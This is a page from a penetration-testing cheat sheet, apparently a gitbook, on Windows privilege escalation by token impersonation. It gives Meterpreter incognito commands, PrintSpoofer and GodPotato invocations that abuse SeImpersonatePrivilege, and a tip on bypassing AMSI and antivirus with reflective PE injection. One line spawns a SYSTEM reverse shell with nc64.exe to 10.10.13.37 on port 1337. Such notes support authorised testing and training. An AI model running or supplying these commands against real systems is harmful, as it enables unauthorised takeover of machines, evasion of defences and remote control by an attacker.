Impersonate Token

Meterpreter Incognito

meterpreter > load incognito

#list all tokens
meterpreter > list_tokens -u

#impersonate token
impersonate_token <complete username>

SeImpersonatePrivileges

If there is antivirus and you able to bypass AMSI, better use Invoke-ReflectivePEInjection to perform printspoofer.exe or godpotato.exe

But the tricky part is when the exe need arguments, so the tips is modified the exe and remove the arguments by directly execute to a revershell or something else.

This meterpreter will make your live easier:

https://hacker-mind.gitbook.io/hacker-mind/metasploit/meterpreter-tricks#manage-multi-session

whoami /priv

# SeImpersonatePrivileges

PrintSpoofer

use this -> https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0

If you have an interactive shell, you can create a new SYSTEM process in your current console.

Use case: bind shell, reverse shell, psexec.py, etc.

.\PrintSpoofer64.exe -i -c cmd

or

If you can execute commands but you don't have an interactive shell, you can create a new SYSTEM process and exit immediately without interacting with it.

Use case: WinRM, WebShell, wmiexec.py, smbexec.py, etc.

.\PrintSpoofer64.exe -c "C:\Windows\Tasks\nc64.exe 10.10.13.37 1337 -e cmd"

God Potato (latest one)

.\GodPotato-NET4.exe -cmd "cmd /c whoami"

reference:

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens

Other Privileges

https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations

PreviousPageNextPivoting

Last updated